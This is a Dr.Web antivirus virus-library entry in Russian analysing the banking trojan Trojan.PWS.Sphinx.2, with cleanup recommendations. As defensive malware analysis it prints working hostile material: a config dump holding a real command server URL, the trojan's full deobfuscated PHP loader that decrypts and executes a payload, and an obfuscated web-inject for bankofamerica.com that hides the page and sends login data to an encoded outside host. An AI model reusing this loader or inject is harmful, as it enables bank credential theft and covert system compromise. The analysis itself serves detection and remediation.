Защити созданное

Другие наши ресурсы

  • free.drweb.ru — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.ru — сетевая лечащая утилита Dr.Web CureNet!
  • www.drweb.ru/web-iq — ВебIQметр
Закрыть

Библиотека
Моя библиотека

+ Добавить в библиотеку

Моя библиотека

Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32 | Skype

Свяжитесь с нами

Профиль

Профиль

Trojan.PWS.Sphinx.2

Добавлен в вирусную базу Dr.Web:2017-02-01
Описание добавлено:2017-02-13

SHA1:

  • packed 4b86b7ec7371a98041391203d17fe731602c8fc0
  • unpacked ac745b2c36fd0529e7e27ba98e1032ad7a108d22
  • client32.dll ff82700ee26bbaf5a3357c5f5070fda9f80f9993
  • client64.dll c31d5caf4927cd5885112649a762a89c812913e0
  • vncdll32.dll a5e2fd98f1e8466700e20b690eed359f79a353bf
  • vncdll64.dll ce6a35afd9332439ac852f51fd9b60d7fd85362b

Банковский троянец, созданный на основе исходных кодов Zeus (Trojan.PWS.Panda) и предназначенный в основном для выполнения веб-инжектов. Код троянца обфусцирован. При запуске вредоносная программа встраивается в процесс explorer.exe и расшифровывает тело загрузчика и конфигурационный блок, в котором скрыт адрес управляющего сервера и ключ для шифрования принимаемых и отправляемых данных.

6C 6C 31 75-63 76 68 75-77 6D 64 74-67 78 37 76  ll1ucvhuwmdtgx7v
71 72 35 65-31 74 36 39-33 69 65 67-67 6D 33 38  qr5e1t693ieggm38
00 78 74 34-6F 78 77 70-61 66 66 6E-38 61 64 38   xt4oxwpaffn8ad8
66 69 77 79-64 37 74 79-74 69 7A 7A-38 66 6B 75  fiwyd7tytizz8fku
39 76 77 69-69 65 6A 6C-68 35 6F 66-79 78 64 7A  9vwiiejlh5ofyxdz
32 67 6D 74-64 35 70 6B-72 34 65 77-6F 78 69 69  2gmtd5pkr4ewoxii
69 6F 67 68-73 36 38 31-30 31 31 37-00 6C 6B 78  ioghs6810117 lkx
38 69 6E 61-72 39 33 75-34 36 69 65-6A 68 70 6E  8inar93u46iejhpn
6E 62 74 71-78 72 32 73-73 37 6F 72-6A 6D 62 67  nbtqxr2ss7orjmbg
37 66 6D 77-66 7A 69 69-68 68 70 36-35 7A 78 78  7fmwfziihhp65zxx
6F 6D 78 33-34 66 74 79-73 64 70 32-72 38 69 68  omx34ftysdp2r8ih
74 74 70 3A-2F 2F 6E 6F-6F 6D 64 6F-6F 6D 73 61  ttp://noomdoomsa
64 69 6B 2E-63 63 2F 72-74 64 2F 72-6F 6B 66 6C  dik.cc/rtd/rokfl
2E 70 68 70-00 6A 32 6A-6E 63 65 6B-77 69 6B 75  .php j2jncekwiku
38 73 75 72-70 64 7A 78-33 32 39 6F-6F 68 39 63  8surpdzx329ooh9c
38 6B 6B 6D-39 70 69 62-36 70 79 37-6B 62 74 6A  8kkm9pib6py7kbtj
71 73 7A 70-62 72 35 6B-36 35 6D 74-61 6D 6D 6F  qszpbr5k65mtammo
6F 6F 39 69-6B 75 36 67-6A 65 64 38-6D 6A 67 6D  oo9iku6gjed8mjgm
32 39 71 6A-72 35 39 39-6D 6E 72 77-68 34 61 62  29qjr599mnrwh4ab
65 70 36 78-68 32 71 37-34 64 36 78-33 73 73 63  ep6xh2q74d6x3ssc
61 64 72 67-69 65 66 38-32 6B 71 69-64 61 36 68  adrgief82kqida6h
7A 33 71 71-63 77 38 6A-66 34 77 69-79 66 34 68  z3qqcw8jf4wiyf4h
6D 37 34 38-39 6F 37 31-31 37 39 72-6F 36 7A 32  m7489o71179ro6z2
6D 78 33 73-63 31 32 39-78 34 69 6D-69 77 75 38  mx3sc129x4imiwu8
38 77 36 37-61 34 6E 77-32 6E 79 71-63 6E 33 73  8w67a4nw2nyqcn3s
70 63 62 35-66 6A 35 39-61 65 6E 6C-72 36 6A 77  pcb5fj59aenlr6jw
37 66 39 69-69 6E 70 39-67 67 71 71-72 33 64 66  7f9iinp9ggqqr3df
68 77 6F 33-03 00 0D 00-75 6B 61 03-00 0D 00 73  hwo3♥ ♪ uka♥ ♪ s
79 73 7A 66-77 34 66 68-64 48 59 32-38 68 41 75  yszfw4fhdHY28hAu
69 6B 7A 68-00 70 75 61-32 6B 78 75-70 37 6C 68  ikzh pua2kxup7lh
70 72 33 61-37 69 31 75-78 6F 7A 33-72 61 68 39  pr3a7i1uxoz3rah9
70 37 64 66-75 6C 6E 39-71 70 79 61-75 62 6D 6A  p7dfuln9qpyaubmj

Вся информация, которой троянец обменивается с управляющим сервером, шифруется. Данные передаются в виде POST-запросов.

В первую очередь троянец отправляет на командный сервер запрос для загрузки модулей. В ответ он получает контейнер, содержащий плагины.

В настоящее время с управляющего сервера скачиваются четыре модуля:

  • client32.dll – модуль для выполнения веб-инжектов в 32-разрядной ОС;
  • client64.dll - модуль для выполнения веб-инжектов в 64-разрядной ОС;
  • vncdll32.dll - модуль VNC для 32-разрядной ОС;
  • vncdll64.dll - модуль VNC для 64-разрядной ОС;

Последние два модуля используются для запуска на зараженной машине VNC-сервера, с помощью которого киберпреступники могут подключаться к зараженному компьютеру.

Кроме того, Trojan.PWS.Sphinx.2 скачивает и сохраняет на инфицированном компьютере набор утилит для установки корневого цифрового сертификата — он используется киберпреступниками для организации атак по технологии MITM:

  • certutil.exe
  • freebl3.dll
  • libnspr4.dll
  • libplc4.dll
  • libplds4.dll
  • msvcr100.dll
  • nss3.dll
  • nssdbm3.dll
  • nssutil3.dll
  • smime3.dll
  • softokn3.dll
  • sqlite3.dll

Для собственного запуска троянец использует сценарий на языке PHP, для этого на диск зараженной машины сохраняется два файла:

  • php.exe
  • php5ts.dll

Код PHP-сценария обфусцирован, в деобфусцированном виде он выглядит следующим образом:

<?php $GLOBALS['2132652578']=Array('imagecopymergegray','strpos','strncmp','file_get_contents','fgets','file_put_contents','exec','unlink','strlen','mt_rand','strtr','chr','ord','mt_rand','strrchr','strpos','bin2hex');
?>
<?php
function _499671292($thgwox){
    $mwvttf=Array("\x3a\x1d\xf7\xe9\x09\x4d\xde\xce\x27\x5d\xc8\xcc\x19\x1b\xf2\xfe\x0d\x5b\xeb\xa1\x0a\x4d\xec\x93\x10\x4c\xdc\xab\xee\x49\xee\x9a\xf7\x5b\xc6\xbd\xde\x55\xc6\xb2\xec\x1f\xdc\xbc\xfd",
    "\x3a\x1d\xf7\xe9\x09\x4d\xde\xce\x27\x5d\xc8\xcc\x19\x1b\xf2\xfe\x0d\x5b\xeb\xa1\x0a\x4d\xec\x93\x10\x4c\xdc\xab\xee\x49\xee\x9a\xf7\x5b\xc6\xbd\xde\x55\xc6\xb2\xec\x1f\xdc\xbc\xfd\x1c\xd3\xbf\xe0",
    'fadrgfnjntmvfl',
    'daz',
    '',
    'sqwwhirkltslkcv',
    'fuwmz');
    return $mwvttf[$thgwox];
}
?>
<?php
$iqegybr=648723321;//round(0+129744664.2+129744664.2+129744664.2+129744664.2+129744664.2);
while(round(0+1457+1457)-round(0+1457+1457))
    imagecopymergegray($rhljwqh);
$trbedbh=_499671292(0);
$rhljwqh=_499671292(1);
$trbedbh=decodeString($trbedbh,$iqegybr); //C:\Users\tere1\AppData\Roaming\Yvtuy\erwo.izy
if(strpos(_499671292(2),_499671292(3))!==false)
    strncmp($iqegybr,$iqavsjx);
$rhljwqh=decodeString($rhljwqh,$iqegybr); //C:\Users\tere1\AppData\Roaming\Yvtuy\erwo.izy.exe
$ebcpnbn=file_get_contents($trbedbh);
if($ebcpnbn){
    $scfhmal=decodeString($ebcpnbn,$iqegybr);
    file_put_contents($rhljwqh,$scfhmal);
    exec($rhljwqh);
    while(!unlink($rhljwqh))
        Sleep(round(0+1));
    $soizplh=round(0+621.8+621.8+621.8+621.8+621.8);
}
function rol($key,$seed){
    $seed2=$seed&31;
    return($key << $seed2)|(($key >>(32-$seed2))&((1<<(31&$seed2))-1));
}
function decodeString($buf,$key){
    $out="";
    $n=strlen($buf);
    for($i=0;$i<$n;++$i){
        $sym=chr(ord($buf{$i})^($key&255));
        $out .= $sym;
         
        $key=rol($key,8);
        ++$key;
    }
    return $out;   
}
?>

Для запуска этого сценария используется ярлык:

%HOMEPATH%\start menu\programs\startup\php.lnk

Пример выполняемого троянцем веб-инжекта:


set_url *.bankofamerica.com/ GP
data_before
<body>
data_end
data_inject
<script id="loader" type="text/javascript">
document.body.style.display = "none";
(function(){
var _0x7f7f=["\x53\x43\x52\x49\x50\x54","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x3F\x72\x61\x6E\x64\x3D","\x72\x61\x6E\x64\x6F\x6D","\x26","\x61\x6A\x61\x78\x5F\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x73\x63\x72\x69\x70\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6C\x6F\x61\x64\x65\x64","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x61\x70\x70\x6C\x79","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50","\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66","\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76","\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F","\x3D","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function sendScriptRequest(_0xade3x2,_0xade3x3,_0xade3x4,_0xade3x5){var _0xade3x6=document[_0x7f7f[1]](_0x7f7f[0]);if(_0xade3x3){_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]()+_0x7f7f[4]+_0xade3x3;} else {_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]();} ;_0xade3x6[_0x7f7f[5]]=false;_0xade3x6[_0x7f7f[6]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[7]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[8]]=_0xade3x2+_0xade3x3;document[_0x7f7f[12]](_0x7f7f[11])[0][_0x7f7f[10]][_0x7f7f[9]](_0xade3x6);} ;function scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5){return function (){if(_0xade3x6[_0x7f7f[5]]){return ;} ;if(!_0xade3x6[_0x7f7f[13]]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[14]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[15]){_0xade3x6[_0x7f7f[5]]=true;_0xade3x4[_0x7f7f[16]](_0xade3x6,_0xade3x5);_0xade3x6[_0x7f7f[10]][_0x7f7f[17]](_0xade3x6);} ;} ;} ;function decode64(_0xade3x9){var _0xade3xa=_0x7f7f[18]+_0x7f7f[19]+_0x7f7f[20]+_0x7f7f[21]+_0x7f7f[22];var _0xade3xb=_0x7f7f[23];var _0xade3xc,_0xade3xd,_0xade3xe=_0x7f7f[23];var _0xade3xf,_0xade3x10,_0xade3x11,_0xade3x12=_0x7f7f[23];var _0xade3x13=0;var _0xade3x14=/[^A-Za-z0-9\+\/\=]/g;_0xade3x9=_0xade3x9[_0x7f7f[24]](/[^A-Za-z0-9\+\/\=]/g,_0x7f7f[23]);do{_0xade3xf=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x10=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x11=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x12=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3xc=(_0xade3xf<<2)|(_0xade3x10>>4);_0xade3xd=((_0xade3x10&15)<<4)|(_0xade3x11>>2);_0xade3xe=((_0xade3x11&3)<<6)|_0xade3x12;_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xc);if(_0xade3x11!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xd);} ;if(_0xade3x12!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xe);} ;_0xade3xc=_0xade3xd=_0xade3xe=_0x7f7f[23];_0xade3xf=_0xade3x10=_0xade3x11=_0xade3x12=_0x7f7f[23];} while(_0xade3x13<_0xade3x9[_0x7f7f[28]]);;return unescape(_0xade3xb);} ;
var bn = "US_" + "BOFA_2";
var bot_id = "%BOTID%_" + bn;
var sa = decode64("aHR0cHM6Ly9pbmJpd29vLmNvbS9hOHNkYXNkai9Ia2E5MGFsLnBocA==");
var req = "send=0&u_bot_id=" + bot_id + "&bn=" + bn + "&page=0&u_login=&u_pass=&log=" + 'get_me_core';
sendScriptRequest(sa, req, function statusCall1() {
   var element = document.getElementById("loader");
  element.parentNode.removeChild(element);
} );
 })();
</script>
data_end
...

Кроме того, в составе троянца имеется так называемый граббер — функциональный модуль, перехватывающий и передающий на удаленный сервер информацию, которую пользователь вводит в формы на различных сайтах. Для этого троянец запрашивает с сервера соответствующие фильтры.

Всю необходимую для своей работы информацию троянец хранит в зашифрованном виде в системном реестре Windows. Имена ветвей реестра генерируются автоматически по специальному алгоритму.

Модули сохраняются в отдельном файле со случайным расширением, который тоже зашифрован.

Новость о троянце

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
  3. Если работа операционной системы заблокирована вредоносной программой семейства Trojan.Winlock, воспользуйтесь сервисом разблокировки компьютера. Если подобрать код разблокировки не удалось, действуйте согласно инструкции, представленной в п.2.
Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно

На 14 дней

Российский разработчик антивирусов Dr.Web

Опыт разработки с 1992 года

Dr.Web пользуются в 200+ странах мира

Dr.Web в Реестре Отечественного ПО

Поставка антивируса как услуги с 2007 года

Круглосуточная поддержка на русском языке

© «Доктор Веб»
2003 — 2018

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.

125040, Россия, Москва, 3-я улица Ямского поля, вл.2, корп.12А